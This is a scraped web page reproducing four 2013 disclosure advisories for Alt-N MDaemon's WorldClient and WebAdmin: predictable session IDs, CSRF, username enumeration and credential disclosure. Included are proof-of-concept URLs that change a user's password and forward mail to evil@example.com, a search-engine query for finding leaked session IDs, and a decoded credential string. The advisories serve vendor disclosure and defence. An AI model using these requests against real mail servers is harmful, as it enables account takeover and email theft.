扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 |
====================================================================== Alt-N MDaemon's WorldClient Predictable Session ID Vulnerability ====================================================================== Software:Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: Session ID Prediction Remote: Yes Local: No Discovered by: QSecure and Demetris Papapetrou References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Predictable_Session_ID.html Discovered: 25/07/2012 Reported: 19/12/2012 Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html) Disclosed: 18/02/2013 VULNERABILITY DESCRIPTION: ========================== Alt-N WorldClient is the web interface of the MDaemon email server. It has been identified that application session state is not maintained by the user's session cookie but by the URL "Session" parameter instead. This parameter is transmitted with every user request sent to the WorldClient web application and under certain circumstances future session IDs can be successfully predicted. The use of predictable session IDs for authentication makes WorldClient prone to session hijacking attacks. If the attacker can generate a current valid session ID then he/she may be able to access webmail accounts without possessing a valid username/password. The impact of the attack is significantly reduced because WorldClient associates the client's IP address with each session ID produced. However, certain network setups or other scenarios may exist that could render the IP restriction ineffective. Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected. Pre-Requisites: --------------- 1) The attacker needs to get a current or expired session ID. a) Google Search: "WorldClient.dll?Session=" b) Steal an HTTP request and observe the Referer field 2) The MDaemon service or the machine has not been restarted since the captured session ID was generated (There may be a way to deal with this but further research is needed). ===================================================================================== Alt-N MDaemon's WorldClient & WebAdmin Cross-Site Request Forgery Vulnerability ===================================================================================== Software:Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: Cross-Site Request Forgery Remote: Yes Local: No Discovered by: QSecure and Demetris Papapetrou References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_and_WebAdmin_CSRF.html Discovered: 25/07/2012 Reported: 19/12/2012 Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html) Disclosed: 18/02/2013 VULNERABILITY DESCRIPTION: ========================== Alt-N WorldClient and WebAdmin applications are prone to a cross-site request-forgery vulnerability. It should be noted that partial protection is provided by the Session parameter, but this alone cannot be considered as an adequate protection mechanism. An attacker can exploit this issue to perform different actions on the affected application without the user's consent. For example, the attacker can change the user's password, forward a copy of the user's emails to a different email account, retrieve his/her address book, send email messages to other users/email addresses and/or perform other similar tasks. Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected. PoC Exploit: ============ Change Password: http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&Password=Letme1n&ConfirmPassword=Letme1n Enable Forwarding: http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=Options-Prefs&Reload=false&Save=Yes&ReturnJavaScript=Yes&ContentType=javascript&ForwardingEnabled=Yes&ForwardingRetainCopy=Yes&ForwardingAddress=evil%40example.com ==================================================================== Alt-N MDaemon's WorldClient Username Enumeration Vulnerability ==================================================================== Software:Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: Username Enumeration Remote: Yes Local: No Discovered by: QSecure and Demetris Papapetrou References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Username_Enumeration.html Discovered: 14/09/2012 Reported: 19/12/2012 Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html) Disclosed: 18/02/2013 VULNERABILITY DESCRIPTION: ========================== Alt-N WorldClient is prone to a username-enumeration weakness by querying the user's Free-Busy schedule. The DTSTART and DTEND parameters in the returned FBData.vfb file, may indicate whether an email address/username is valid or not. Attackers may exploit this weakness to discern valid usernames. This may aid them in brute-force password cracking or other attacks. Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected. PoC Exploit: ============ http://www.example.com:3000/WorldClient.dll?View=fbinfo&User=mickey.mouse@qsecure.com.cy For valid email accounts the DTSTART and DTEND values in the .vfb file start with a recent date backwards (e.g. 20120505) whereas for invalid ones the date is 19801231. ========================================================================================== Alt-N MDaemon's WorldClient Disclosure of Authentication Credentials Vulnerability ========================================================================================== Software:Alt-N MDaemon v13.0.3 and prior versions Vendor: http://www.altn.com/ Vuln Type: Disclosure of Authentication Credentials Remote: Yes Local: No Discovered by: QSecure and Demetris Papapetrou References: http://www.qsecure.com.cy/advisories/Alt-N_MDaemon_WorldClient_Disclosure_of_Authentication_Credentials.html Discovered: 01/10/2012 Reported: 19/12/2012 Fixed: 15/01/2013 (http://files.altn.com/MDaemon/Release/RelNotes_en.html) Disclosed: 18/02/2013 VULNERABILITY DESCRIPTION: ========================== Alt-N WorldClient application is prone to an authentication credentials disclosure via a specially formulated HTTP request. This is possible because the application replies to the request with a response that contains the credentials in an encoded (reversible) format. Attackers may trick an unsuspecting user into opening a malicious email message -using the WorldClient application- and stealing his/her authentication credentials without the user ever noticing. Alt-N MDaemon v13.0.3 & v12.5.6 were tested and found vulnerable; other versions may also be affected. PoC Exploit: ============ Vulnerable URL: http://www.example.com:3000/WorldClient.dll?Session=[SESSION_ID]&View=WebAdmin Encoded Auth String: GaDAQBQOP3cymUmJxiNVaz80JTAklc/c+q7fAhmklkQSdp0XMo2X/4aVhqMtLz4OLuCf6v2T0Gc9KKHkvn ok0B9ARyso9/k Decoded Auth String: User=test%40ac1dc0de.com&Password=111111Ab&TimeStamp=1344532850&Lang=en |
体验盒子
